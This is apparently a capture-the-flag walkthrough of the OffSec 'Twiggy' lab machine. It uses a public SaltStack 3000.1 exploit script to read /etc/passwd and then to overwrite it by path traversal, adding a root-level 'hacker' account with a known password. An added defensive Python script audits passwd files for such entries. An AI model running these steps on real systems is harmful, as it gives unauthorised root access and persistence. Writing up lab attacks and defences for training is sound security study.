title: Proving grounds Practice: Twiggy
layout: post
date: 2023-08-27 01:00
tag: CTF, Offsec labs, OSCP, Writeup, Linux, Pg-Practice
writeups: true
hidden: true
author: Naveen
description: Offsec proving grounds practice linux machine writeup

Nmap

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
53/tcp   open  domain  NLnet Labs NSD
80/tcp   open  http    nginx 1.16.1
4505/tcp open  zmtp    ZeroMQ ZMTP 2.0
4506/tcp open  zmtp    ZeroMQ ZMTP 2.0
8000/tcp open  http    nginx 1.16.1

Web

PORT: 80


PORT: 8000


The SaltStack Salt REST API is running.


SaltStack is vulnerable to "Saltstack 3000.1 - Remote Code Execution".

Exploitation

python exploit.py --master 192.168.174.62 --read /etc/passwd


We were unable to obtain a reverse shell using the exploit's --exec option, but we can create our own new user account and add it to the /etc/passwd file.

Create new user

openssl passwd hacked
$1$iBeMKMaU$.O3VYqCZxUvapPL.OQ97/1

hacked is the password.

Add the following line to the /etc/passwd content we extracted from the target machine.

hacker:$1$iBeMKMaU$.O3VYqCZxUvapPL.OQ97/1:0:0:root:/root:/bin/bash

Writing /etc/passwd file

python exploit.py --master 192.168.174.62 --upload-src passwd --upload-dest ../../../../../../../../../../etc/passwd


Verify that the user exists

SSH to the target machine with the username hacker and the password hacked.

Root Obtained
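
From the defender's side, the entry written above stands out in two ways: it is a second UID 0 account, and it carries its password hash in /etc/passwd itself instead of the usual x placeholder. The following added example (not part of the original writeup) audits passwd-format text for both; the sample data and the function name audit_passwd are constructed for illustration.

```python
# Added example, not from the original writeup: audit passwd-format text for
# the kind of entry shown above (extra UID 0 account, hash stored in passwd).

# Constructed sample: two ordinary entries plus the line from the writeup.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
nginx:x:997:995:Nginx web server:/var/lib/nginx:/sbin/nologin
hacker:$1$iBeMKMaU$.O3VYqCZxUvapPL.OQ97/1:0:0:root:/root:/bin/bash
"""

# crypt(3) scheme identifiers that can appear between the first two '$'.
CRYPT_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt",
             "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt", "y": "yescrypt"}


def audit_passwd(text):
    """Return (line_no, user, finding) tuples for suspicious entries."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line_no, fields[0], "malformed entry"))
            continue
        user, pw, uid = fields[0], fields[1], fields[2]
        # Any UID 0 name other than root has full root privileges.
        if uid == "0" and user != "root":
            findings.append((line_no, user, "UID 0 account other than root"))
        # With shadow passwords the field is normally "x"; a "$..." value
        # means a usable hash was placed directly in the world-readable file.
        if pw.startswith("$"):
            scheme = CRYPT_IDS.get(pw.split("$")[1], "unknown scheme")
            findings.append(
                (line_no, user, f"password hash stored in passwd ({scheme})"))
        elif pw == "":
            findings.append((line_no, user, "empty password field"))
    return findings


if __name__ == "__main__":
    import sys
    # Audit the file given on the command line, or the constructed sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for line_no, user, finding in audit_passwd(text):
        print(f"line {line_no}: {user}: {finding}")
```

Run it against a copy of /etc/passwd by passing the path as the first argument; with no argument it audits the constructed sample.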

Thanks for reading!

For more insights and updates, follow me on Twitter: @thevillagehacker.